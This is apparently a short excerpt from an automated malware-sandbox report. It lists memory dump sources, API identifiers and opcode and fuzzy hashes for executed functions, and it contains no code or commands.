                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 5ad3772ebe0a54c30b3d389cac015b7956ebf39193627d4bdb547823a529befa
                                • Instruction ID: eb54533bd08efbb948e28874438a6a0d39d6b8d570ca5e402179bd35dd800531
                                • Opcode Fuzzy Hash: 5ad3772ebe0a54c30b3d389cac015b7956ebf39193627d4bdb547823a529befa
                                • Instruction Fuzzy Hash: 66E0ED73911265A787119AA4BC4DD9FBBADEE89661308042AFA0493140CB249805DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Memory Dump Source
                                • Source File: 0000001B.00000003.469231433.00000175A94B0000.00000010.00000001.sdmp, Offset: 00000175A94B0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                • Instruction ID: bf7d8a1288843d981b78ae881acfde9de7faf60dbb728bdbcfaf10ca365a720a
                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                • Instruction Fuzzy Hash: 5C90021899981A55D51411910C4529C56617388251FD48690851A91148D5DE42962152
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions